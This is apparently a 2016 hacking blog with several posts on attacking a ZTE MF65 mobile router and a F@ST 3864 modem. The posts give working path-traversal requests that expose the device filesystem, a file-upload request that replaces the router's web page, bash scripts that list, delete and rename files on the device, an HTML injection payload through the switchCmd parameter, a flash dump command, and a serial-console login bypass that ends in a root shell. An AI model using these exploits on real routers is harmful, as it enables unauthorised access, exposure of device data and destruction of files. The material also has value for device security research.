Friday 24 June 2016

/////ZTE MF65 -- local file listing method 3(LFLM )The Full Package /////

/////ZTE MF65 -- local file listing method 3(LFLM )The Full Package /////

another super quick one for a even better listing in the web application with the ability to change your path via the sd card settings, we use the exploit from last time to gain a web app access to the web folder, this time though we have a little bit more work to do, so here we go from the start :


POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.168.0.1

isTest=false&goformId=HTTPSHARE_AUTH_SET
&HTTP_SHARE_STATUS=Enabled
&HTTP_SHARE_WR_AUTH=readWrite
&HTTP_SHARE_FILE=..%2Fweb%2F


using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager,
you will need to be logged in for this method.

so your work flow is:
  1. login
  2. send request to change path 
  3. logout
use the httpguest button to see the files

now we will navigate to web/js/config/ then we will download the config.js file and change the line :

 SD_BASE_PATH: /mmc2/

to

 SD_BASE_PATH: /

and reupload it as what ever name you would like i did config.js.1
 and then rename the original config.js then rename the new config to replace the old one now refresh your page and check you sd card settings page to see the changes,

I must warn against changes of //web/js/config/config.js
Line : SD_BASE_PATH: /mmc2/
 
Against any directory transversals. in any sense or method as they will not work...

any changes to this path that will reflect as " "(an empty path) will render the online sd functions unusable and returning to normal operation at this point is not available via the methods we can employ.. (we need telnet)

so don't upload the file with  /mmc2/../ or anything like that,

till next time,
shoot straight,
FrankSxx

Monday 13 June 2016

/////ZTE MF65 -- local file listing method 2(LFLM )/////

another super quick one for a better listing in the web application


POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.168.0.1

isTest=false&goformId=HTTPSHARE_AUTH_SET
&HTTP_SHARE_STATUS=Enabled
&HTTP_SHARE_WR_AUTH=readWrite
&HTTP_SHARE_FILE=..%2Fweb%2F


using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager,
you will need to be logged in for this method.

so your work flow is:
  1. login
  2. send request to change path 
  3. logout
use the httpguest button to see the files


this can be used to include files, delete, create and rename files/folders.
this is method requires login but other methods can work without a login.

till next time :)
FrankSxx

Sunday 12 June 2016

// Zte MF65 Local/Exec File Include //

 

##  File Upload/Exec LFI ##

hey new one, demonstration of web server executable includes

use post to send off this file, this file has our basic index re uploaded
without the service providers logo

use hijack.html to load the new file, it may fail it also may say it was a success without actually working use with the lister bash script to check the /webs folder


POST /cgi-bin/web/Hijack.html HTTP/1.1
Host: Your IP
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------13738844281409151800268458935
Content-Length: 10299

-----------------------------13738844281409151800268458935
Content-Disposition: form-data; name="path_SD_CARD_time"

2016-06-12 04:28:43
-----------------------------13738844281409151800268458935
Content-Disposition: form-data; name="path_SD_CARD_time_unix"

1465705724
-----------------------------13738844281409151800268458935
Content-Disposition: form-data; name="filename"; filename="Hijack.html"
Content-Type: text/html


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta charset="utf-8" />
<title></title>
<link type="text/css" href="theme/common.css" rel="stylesheet" />
<link type="text/css" href="theme/chosen.css" rel="stylesheet" />
<link href="favicon.ico" rel="shortcut icon" />
<meta name="viewport" initial-scale="1.0" />
<!--[if lt IE 9]>
    <link type="text/css" href="theme/IE678css.css" rel="stylesheet" />
<![endif]-->
<!-- link href="theme/slideshow.css" rel="stylesheet" / -->
<!--[if lt IE 9]>
       <script type="text/javascript" src="js/lib/html5shiv.js"></script>
    <![endif]-->
</head>
<body>
    <div id='msgOverlay'>
        <div><span  id='msgDiv'></span></div>
    </div>
    <div id="mainBody-fluid">
               <div id="statusBar" class="span8 side-right margintop5">
                    <span class="statusItem" title="network_type" i18n="true" id="networkType" data-bind="text: networkType"></span>
                    <span class="statusItem" title="network_provider" i18n="true" id="operator" data-bind="text: networkOperator"></span>
                    <span class="statusItem" title="spn_title" i18n="true" id="spn" data-bind="text:spn"></span>
                    <!--<span class="statusItem hide" title="ota_title" i18n="true" id="OTA" data-bind="visible:OTAStatus">
                        <a onclick="return showOTAAlert();">
                            <img class="paddingbottom6" src="./img/update.gif"/>
                        </a>
                    </span>-->
                    <span class="statusItem" title="signal_strength" i18n="true" id="signal_strength"><i class="signal" data-bind="attr:{'class': signalCssClass}">&nbsp;</i></span>
                    <span class="statusItem" title="connection_status" i18n="true" id="connection_status"><i class="icon_connection" data-bind="attr:{'class': connectionCssClass}">&nbsp;</i></span>
                    <span class="statusItem" title="sms_unread_count" i18n="true" id="sms_unread_count" data-bind="visible: smsUnreadCount() > 0 || showSmsDeleteConfirm()" style="display: none;">
                        <a onclick="return gotoSmsList();" href="javascript: void(0)">
                            <img data-bind="visible: smsUnreadCount() > 0 && !showSmsDeleteConfirm()" class="paddingbottom6" src="./img/sms_unread.png"/>
                            <img data-bind="visible: showSmsDeleteConfirm()" class="paddingbottom6" src="./img/sms_full.gif"/>
                            <span data-bind="visible: smsUnreadCount() > 0, text: smsUnreadCount" class="smsUnreadCount"></span>
                        </a>
                    </span>
                    <span class="statusItem" title="sim_status" i18n="true" id="statusItemSimStatus"><img data-bind="attr: {src: simStatus}" class="paddingbottom6"/></span>
                    <span class="statusItem" title="roaming_status" i18n="true" id="roamingStatus" data-bind="visible: roamingStatus() == 'R'" style="display: none;"><img class="paddingbottom6" src="./img/roaming.png"/></span>
                    <span class="statusItem" title="wifi_status" i18n="true" id="wifi_status" data-bind="visible: hasWifi"><img class="paddingbottom6" id="wifi_status_img" data-bind="attr: {src: wifiStatusImg}"/></span>
                    <span class="statusItem" title="battery_level" i18n="true" data-bind="visible: hasBattery"><img  class="paddingbottom6" id="batteryCharging" data-bind="attr: {src: batteryPers}"/></span>
                </div>
            </div>
            <div class="row-fluid marginbottom5">
                <div id="themeContainer" class="span12 side-right" >
                    <span id="themeSection" style="display: none;">
                        <span class="colorBlock default" data-bind="css: {active: currentTheme() == 'style'}, click: function(data, event) { themeClickHandler(data, event, 'style') }">&nbsp;</span>
                        <!-- span class="colorBlock blue" data-bind="css: {active: currentTheme() == 'blue'}, click: function(data, event) { themeClickHandler(data, event, 'blue') }">&nbsp;</span-->
                        <span class="colorBlock mac" data-bind="css: {active: currentTheme() == 'mac'}, click: function(data, event) { themeClickHandler(data, event, 'mac') }">&nbsp;</span>
                        <link data-bind="attr: {href: themeHref}" rel="stylesheet" id="customTheme" type="text/css"/>
                    </span>
                    <select id="language" class="marginright10 hide" data-bind="options: languages, value: currentLan, optionsText: 'text', optionsValue: 'value', event:{ change: langChangeHandler}"></select>
                    <span id="login">
                        <span trans="password"></span>
                        <input id="txtPwd" autocomplete="off" class="require" type="password" maxlength="32"
                               name="txtPwd"/>
                        <span id="txtRequire" class="colorRed hide"></span>
                        <input id="btnLogin" class="btn-1" type="button" trans="login"/>
                    </span>
                    <span id="logout">
                        <a id="logoutlink" class="logout marginright10" trans="logout" href="javascript:void(0)" data-bind="click:logout"></a>
                    </span>
                    <span><img src="img/hui_spe.png" width="3px" height="40px"></span>
                    <span><a href="#traffic_statistics"><span class="index_toplink">My Data Usage</span></a></span>
                    <span><img src="img/hui_spe.png" width="3px" height="40px"></span>
                    <span><a href="MF65_Help/MF65%20manual_2.2.htm" target="_blank"><span class="index_toplink">Help</span></a></span>
                </div>
            </div>
        </div>
    </div>

    <div id='nav' data-bind="visible:showMenu()"  class="row-fluid">
        <ul id="list-nav" data-bind="foreach: mainMenu" class="span12">
            <li data-bind='attr: {mid: hash.substring(1)}'>
                <a data-bind='attr: {href: hash, trans: hash.substring(1)}'></a>
            </li>
        </ul>
    </div>
    <div class="row-fluid">
        <div id="mainContainer" class="row-fluid">
            <div id='left' class="span3" data-bind='visible: secondMenu().length > 0'>
                <ul id="leftmenu" data-bind="foreach: {data: secondMenu }">
                    <li data-bind="visible: false, text: $root.getThirdMenu($data)"></li>
                    <li data-bind="attr: {'class': 'menu-two-level ' + hash.substring(1) }">
                        <a data-bind='attr: {href: hash, trans: hash.substring(1)}'></a>
                    </li>
                    <li data-bind='visible: $root.thirdMenu().length > 0' class="hide">
                        <ul class="third" data-bind="foreach: $root.thirdMenu()">
                            <li data-bind="attr: {'class': 'menu-three-level ' + hash.substring(1) }">
                                <a data-bind='attr: {href: hash, trans: hash.substring(1)}'></a>
                            </li>
                        </ul>
                    </li>
                </ul>
            </div>
            <div id='container' class="span9 paddingnone"></div>
        </div>
    </div>
    <div id='footer' class="side-center">
        <span trans='copyright' class="hide"></span>
        <span class="copyBg">Click <a href="http://www.telstra.com.au/account-services/" target="_blank"><span style="text-decoration: underline;color:#fff;">here</span></a> to access your Account Services</span>
    </div>
</div>
<div id='loading'>
    <div class='header'><span id="loadMsg"></span></div>
    <br/>

    <div style='text-align: center'>
        <img id="loadingImg"/>
        <div id="loading_container"></div>
    </div>
</div>

<div id='progress'>
    <div class='header'><span id="barMsg"></span></div>
     <br/>
     <div class="progress-content">
         <div class="progress-bar-container">
             <div id="bar" class="progress-bar"></div>
             <div id="barValue" class="progress-bar-value"></div>
         </div>
         <div id="progress_container" id="progress-prompt"></div>
     </div>
 </div>
<!-- confirm content -->
<div id='confirm'>
    <div class='header'><span id="popTitle"></span></div>
    <div class='icon'><img id='confirmImg'/></div>
    <div class='message'></div>
    <div class='promptDiv hide'><input name="promptInput" id="promptInput" type="text" maxlength="25" class="width190"/><br/>
        <label class="promptErrorLabel colorRed"></label></div>
    <div class='buttons'>
        <input type="button" class="btn-1 simplemodal-close" id='okbtn' trans='ok'/>
        <input type="button" class="btn-1 " id='yesbtn' trans='yes'/>
        <input type="button" class="btn-1 simplemodal-close" id='nobtn' trans='no'/>
    </div>
</div>
<div id="buttom-bubble">
</div>
<script type="text/x-jquery-tmpl" id="newMessagePopTmpl">
    <div class="bubbleItem ${report}" id="${mark}">
        <h3>
            <span trans="${titleTrans}">${title}</span> ${name} <a href="javascript:void(0);" data-targetid="${mark}" class="bubbleCloseBtn"></a>
        </h3>
        <div class="bubbleContainer">
            <div class="bubbleContent">${content}</div>
            <div class="bubbleDatetime">${datetime}</div>
        </div>
    </div>
</script>
<script type="text/javascript" data-main="js/main" src="js/lib/require/require-jquery.js"></script>
</body>
</html>

-----------------------------13738844281409151800268458935--

Mf65 File List/Rename/Delete Bash Scripta

quick upload:
these have (your.local.ip) change to suit yours

bash script for file listings:

###################################
#!/bin/sh


echo "use ^c to exit"
echo "path"
read PARAM1
echo "page\(please use 1 as default\(10 r/s per page\)\)"
read PARAM2
echo '
    '
HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD="$PARAM1"&indexPage=$PARAM2"

curl "$HOST_PARAM"

echo '


    '

echo "New Page Number? or 0 to go back."

read PARAM3

HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD="$PARAM1"&indexPage=$PARAM3"

    curl "$HOST_PARAM"
   
echo '


'

echo "use ^c to exit"
echo "path"
read PARAM1
echo "page\(please use 1 as default\(10 r/s per page\)\)"
read PARAM2

HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD="$PARAM1"&indexPage=$PARAM2"

curl "$HOST_PARAM"

echo '
    '

echo "New Page Number? or 0 to go back."

read PARAM3

HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD="$PARAM1"&indexPage=$PARAM3"

    curl "$HOST_PARAM"
   
echo "use ^c to exit"
echo "path"
read PARAM1
echo "page\(please use 1 as default\(10 r/s per page\)\)"
read PARAM2

HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD="$PARAM1"&indexPage=$PARAM2"

curl "$HOST_PARAM"

##############################################

bash for deleting files

#################################33
 #!/bin/sh


echo "use ^c to exit"
echo "path to delete file from use mmc2 for sd card"
read PARAM1
echo "file name to delete"
read PARAM2
echo '
    '
HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_DEL&path_SD_CARD=$PARAM1&name_SD_CARD='$PARAM2'*"

curl "$HOST_PARAM"


echo '
           '
 ##################################

bash for rename(can be used on all sorts of files in all sorts of places)

###################################

 #!/bin/sh


echo "use ^c to exit"
echo "path_SD_CARD"
read PARAM1
echo "OLD_NAME_SD_CARD"
read PARAM2
echo "NEW_NAME_SD_CARD"
read PARAM3
echo '
    '
HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_FILE_RENAME&path_SD_CARD=$PARAM1&OLD_NAME_SD_CARD=$PARAM2&NEW_NAME_SD_CARD=$PARAM3&path_SD_CARD_time=2016-06-11+05%3A49%3A06&path_SD_CARD_time_unix=1465624146"


curl "$HOST_PARAM"


echo '


    '


Sunday 5 June 2016

///Zte MF65 local file listing/include exploits///

///Zte MF65 local file listing/include exploits///

hey guys back again and another quickie but goodie,
ive been searching for any traces of the internal filesystem of this router by every method of lfi i could think of, i was lured to the http share page, this is the page used to upload files into the sd card, it seems to be locked to the mmc2 path, via the requests made, the paths are set in the httpshare files
(off the top of my head they are in the tmpl/sd path and in the js path)
the htttp page uses a directory check to obtain a listing of the files in the said directory(mmc2) by changing the check querys we end up with a few local file listing includes and a few local file includes:
we are using xml reqeusts via your favourite request launcher (nc,curl,burp,whatevs)

using:

POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.165.0.1
User-Agent: your own uA
 Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://--your ip --/index.html
Content-Length: 75
Connection: close
isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD=%2F..%2F&indexPage=1


 we are using the path_SD_CARD=%2F..%2F
 (we must use url encoding on this param)
we can get listings from everywhere with this query
this is the results for the ./ path


 which returns with :

{"result":{"fileInfo":[{"fileName":".efs_private","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"1.txt","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"AUTORUN.FLG","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"Images","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"KEEPRNDISDBG.FLG","attribute":"file","size":"4","lastUpdateTime":"315964800"},{"fileName":"NODOWNLOAD.FLG","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"SWITCH.TMP","attribute":"file","size":"34","lastUpdateTime":"315964800"},{"fileName":"TCARD_SHARE","attribute":"file","size":"32","lastUpdateTime":"315964800"},{"fileName":"UimEfsAPDULog.Txt","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"ZTEMODEM.ISO","attribute":"file","size":"5216256","lastUpdateTime":"315964800"}],"totalRecord":"25"}}
{"fileName":"config","attribute":"file","size":"20080","lastUpdateTime":"315964800"}],"totalRecord":"25"}}
{"fileName":"etc","attribute":"document","size":"0","lastUpdateTime":"315964800"},
{"fileName":"mmc2","attribute":"document","size":"0","lastUpdateTime":"0"},{"fileName":"mmgsdi","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"nv","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"nvconfig_debug","attribute":"file","size":"7840","lastUpdateTime":"315964800"},{"fileName":"nvm","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"pbm_phone_uid.dat","attribute":"file","size":"9","lastUpdateTime":"315964800"},{"fileName":"pdp_profiles","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"reset_cntr.bin","attribute":"file","size":"4","lastUpdateTime":"315964800"},{"fileName":"sms","attribute":"document","size":"0","lastUpdateTime":"315964800"}],
{"fileName":"storage.ds","attribute":"file","size":"32","lastUpdateTime":"315964800"},{"fileName":"test","attribute":"file","size":"0","lastUpdateTime":"315964800"},
{"fileName":"var","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"web","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"wificonfig","attribute":"document","size":"0","lastUpdateTime":"315964800"}],"totalRecord":"25"}}


they are capped at returning a max of 10ish files but changing indxPage to 2 will load the next page of results,
notice the .efs_private file
lending hints that the fs is encrypted and extracted at run time, there is many keys inside the firmware provided by u_mob for the mf65 that are almost 100% the same file system except for of cause the providers changes, like telstra dont call there query key a lucky number anymore its just _=(luckynumber)=(timeinseconds)

well stay tuned as i pull that .efs_private and the ZTEMODEM.ISO files


also a quick trick is to change the names of the uploaded files via the rename to resolve a file in a place other than the mmc2 folder
the rename query can also be used to change file names of files in other places using the same exploits, please ill get around to these as soon as i get the chance

till then guys stay fucken sharp and dont trip on your self :P

Wednesday 1 June 2016

ZTE(telstra)MF65 -Remote file include-

ZTE(telstra)MF65

Remote file include :

this exploit uses :
http://Your-R-IP/goform/goform_process?goformId=MODE_SWITCH&switchCmd=
and exploits the loose handling of closing html tags because the switchCmd  page  uses a unclosed <title> tag to normally write the switch command and return either success or fail in the page title, this leads us to closing the <tiltle> and starting a new tag, i found <xyz> worked as an arbitrary tag 
, this worked great(you could use anything in there), so we have :
 switchCmd=pagenamegoeshere</title><xyz>

and using the img tag and span tags we get


<img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this will take us out of the local net</span></a></span>

then we close out the <xyz>

and finally we use a unclosed <script> to hide the rest of the normal output 
in total we get:

 http://Your-R-IP/goform/goform_process?goformId=MODE_SWITCH&switchCmd=pagenamegoeshere</title><xyz><img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this will take us out of the local net</span></a></span></xyz><script> 


we cant use & or # symbols in the scripts so it makes it kinda hard to utilise all of  scripting used by the webserver although 
 this can be used to append # to objects via scripting:
 
<a trans="  ? " href="  ? " data-bind="attr: {href: hash, trans: hash.substring(1)}">
gives href:# ?
and  trans:# ?


till next time

f@st 3864: dumping the filesys

Wednesday, 1 June 2016

F@ST 3864v1: dumping the filesys

F@ST 3864v1: dumping the filesys
 this is easily accomplished via cat:
#cat /dev/mtd0 > (either(/tmp/www/mtd.jpg)(/mnt/usb1_1)
 retrive the file via http://localhost/tmp/www/mtd.jpg
 Or
Via usb
or
Even Tftp

the rootFS.jffs2 is stored in mtd0 (this will include the cferam.000 file )
the rootFs_update is stored in mtd1
the data is stored in mtd2
the nvram is stored in mtd3
 you can use binwalk to extract the rootfs as long as you have installed jefferson(jffs2 libary)(https://github.com/sviehb/jefferson)

Now we can turn our focuses towards the bin contents and the lib functions..
stay tuned

f@st 3864: serial prompt authentication exploit.


F@ST 3864v1: serial prompt authentication exploit.


 F@ST 3864v1:
 serial prompt authentication exploit.


ok guys this ones a really quick one, ive got alot to come but this is urgent :P


during my usual diggings i was left sitting at the caret waiting on a login to begin..

Login: /////////////////////////////////////////////////////////////////////////
Password:                                                                      
Login incorrect. Try again.                                               

next i thought just a web null what could be the worst that happens:
Login:                                                                    
Password:                                                                      
Login incorrect. Try again.

next was:

Login: %^]���^B����؀=y4���^B���^\

just as a random ammount of unicode chars

and then i learnt

that i could simply use
Login: ^\ (this ones the stty quit command)

wlmngr/669: potentially unexpected fatal sign .
smd/340: potentially unexpected fatal signal 3.
 Cpu 0                                                                         
$ 0   : 00000000 10008d00 00000202 00000012                                   
$ 4   : 00000012 7fee1710 00000000 00000001                                   
$ 8   : 00000000 7fee15ec 00000000 77fe9434                                   
$12   : 00009326 7fee15e4 00000000 00000000                                   
$16   : 7fee1964 00000001 00401e2c 00000000                                   
$20   : 00000000 00000000 00000000 00407b48                                   
$24   : 00000000 2adaef90                                                     
$28   : 2adfc3e0 7fee1668 7fee1698 00404884                                   
Hi    : 00c34ea5                                                              
Lo    : 1f6336bc                                                              
epc   : 2adaefcc 0x2adaefcc                                                   
    Tainted: P                                                                
ra    : 00404884 0x404884                                                     
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
�consoled/976: potentially unexpected fatal signal 3.                         
swmdk/776: potentially unexpected fatal signal 3.                             
swmdk/727: potentially unexpected fatal signal 3.                             
dsldiagd/726: potentially unexpected fatal signal 3.                          
dhcpd/357: potentially unexpected fatal signal 3.                             
�                                                                             
                                                                              
Cpu 0                                                                         
$ 0   : 00000000                                                              
Cpu 1                                                                         
$ 0   : 00000000 00000001 00000200 00000000                                   
$ 4   : 00000003 0041951c 0000001c 00000001                                   
$ 8   : 02000000 626c6564 4f4d5f43 4f4d5f47                                   
$12   : 75657374 49736f6c 61746543 6c69656e                                   
$16   : 0041951c 00000003 00400e34 00000000                                   
$20   : 00000000 00000000 00000000 00407b48                                   
$24   : 00000001 2af12980                                                     
$28   : 2af603e0 7ff7e328 7ff7e380 2af0e940                                   
Hi    : 00000001                                                              
Lo    : 00000000                                                              
epc   : 2af129a4 0x2af129a4                                                   
    Tainted: P                                                                
ra    : 2af0e940 0x2af0e940                                                   
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
 00000001 00000202 0041ed80                                                   
$ 4   : 00000005 7fa5167c 00000000 00000001                                   
$ 8   : 00000030 00000000 00000001 00000057                                   
$12   : 00000807 00000800 00000400 00000008                                   
$16   : 0041ec68                                                              
Cpu 1                                                                         
$ 0   : 00000000 7fd4d1c6 00000202 00000001                                   
$ 4   : 00000001 7fd4d18c 00000000 00000001                                   
$ 8   : 03994c69 00000001 0000005b 00000000                                   
$12   : 00000001 2ac456f3 2ab4bafb 2ac4171c                                   
$16   : 7fd4d5d4 00000003 00400fc4 00000000                                   
$20   : 00000000 00000000 00000000 00407b48                                   
$24   : 2ac3b96c 2aea4f90                                                     
$28   : 2aef23e0 7fd4d0f8 7fd4d128 2ab5069c                                   
Hi    : 0000031b                                                              
Lo    : 0000e4c2                                                              
epc   : 2aea4fcc 0x2aea4fcc                                                   
    Tainted: P                                                                
ra    : 2ab5069c 0x2ab5069c                                                   
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
 0000a8dd                                                                     
Cpu 1                                                                         
$ 0   : 00000000 7ffcf074 00000202 7ffcfdbc                                   
$ 4   : 00000006 7ffcfdbc 00000000 00000001                                   
$ 8   : 00000000 00000000 00000000 00000000                                   
$12   : 00000000 00000000 00000000 00000000                                   
$16   : 7ffd0024 00000001 00401000 00000000                                   
$20   : 00000000 00000000 00000000 00407b48                                   
$24   : 00000000 2abb7f90                                                     
$28   : 2ac053e0 7ffcfc98 7ffcfcc8 004012d8                                   
Hi    : 00000000                                                              
Lo    : 00000000                                                              
epc   : 2abb7fcc 0x2abb7fcc                                                   
    Tainted: P                                                                
ra    : 004012d8 0x4012d8                                                     
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
 0041ec68                                                                     
Cpu 1                                                                         
$ 0   : 00000000 10008d00 00000202 80000000                                   
$ 4   : 7fab3ac0 00000010 7fab3ac0 00000001                                   
$ 8   : 00000000 00000000 00000000 00000415                                   
$12   : 00000415 87b87c00 00000002 2af8a288                                   
$16   : 7fab3ac0 2aafd454 2aafd480 00000000                                   
$20   : 2aae17d0 00000000 00000000 00407b48                                   
$24   : 2af86868 2af97760                                                     
$28   : 2afe43e0 7fab3a88 7fab3c28 2aae7238                                   
Hi    : 00000018                                                              
Lo    : 00038c23                                                              
epc   : 2af97788 0x2af97788                                                   
    Tainted: P                                                                
ra    : 2aae7238 0x2aae7238                                                   
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
Cpu 1                                                                         
$ 0   : 00000000 10008d00 00000000 00000000                                   
$ 4   : 7f3ffaf8 7f3ffaf8 00000000 00000000                                   
$ 8   : 00000000 00008d00 00000000 87848000                                   
$12   : 000092bc 811018e0 00000000 00000000                                   
$16   : 7f3ffaf8 7f3ffaf8 00000002 00000000                                   
$20   : 7f3ffb80 2aafd480 7f201000 00000004                                   
$24   : 00000000 2af966c0                                                     
$28   : 2afe43e0 7f3ffa90 7f3ffca8 2aae6b50                                   
Hi    : 00000000                                                              
Lo    : 3b9aca00                                                              
epc   : 2af966e4 0x2af966e4                                                   
    Tainted: P                                                                
ra    : 2aae6b50 0x2aae6b50                                                   
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
 00000001                                                                     
$20   : 7fa51d14 0040bf84 0040bff0 0040bfa4                                   
$24   : 00000001 2ab57f90                                                     
$28   : 2aba53e0 7fa515e8 7fa51618 00402488                                   
Hi    : 00000000                                                              
Lo    : 0002b4e0                                                              
epc   : 2ab57fcc 0x2ab57fcc                                                   
swmdk/777: potentially unexpected fatal signal 3.                             
                                                                              
Cpu 1                                                                         
$ 0   : 00000000 00000001 00000204 00000000                                   
$ 4   : 7f1ffaf8 7f1ffaf8 00000000 00000001                                   
$ 8   : 00000000 80000008 80095310 fffffff0                                   
$12   : 7f1ffb00 00000000 7f3ffab8 00000000                                   
$16   : 7f1ffaf8 7f1ffaf8 00000003 00000000                                   
$20   : 7f1ffb80 2aafd480 7f001000 00000004                                   
$24   : 00000000 2af966c0                                                     
$28   : 2afe43e0 7f1ffa90 7f1ffca8 2aae6b50                                   
Hi    : 08e5afb8                                                              
Lo    : 22b60d87                                                              
epc   : 2af966e4 0x2af966e4                                                   
    Tainted: P                                                                
ra    : 2aae6b50 0x2aae6b50                                                   
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
    Tainted: P                                                                
ra    : 00402488 0x402488                                                     
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
ssk:error:704.805:ssk_main:435:detected exit of smd, ssk will also exit       
Quit                                                                          
dnsproxy:error:704.807:processCmsMsg:1258:lost connection to smd, exiting now.
tr69c:error:704.808:readMessageFromSmd:1555:lost connection to smd, exiting now.


 And we have shell
#

although we have broken the router and it will now require a restart

enjoy and ill be back really soon with a few more surprises

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
STTY commands:

intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>;          
                                                                               
eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; 
                                                                               
werase = ^W; lnext = ^V; flush = ^O; min = 1; time = 0;                        
                                                                               
-brkint ixoff -imaxbel                                                         
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\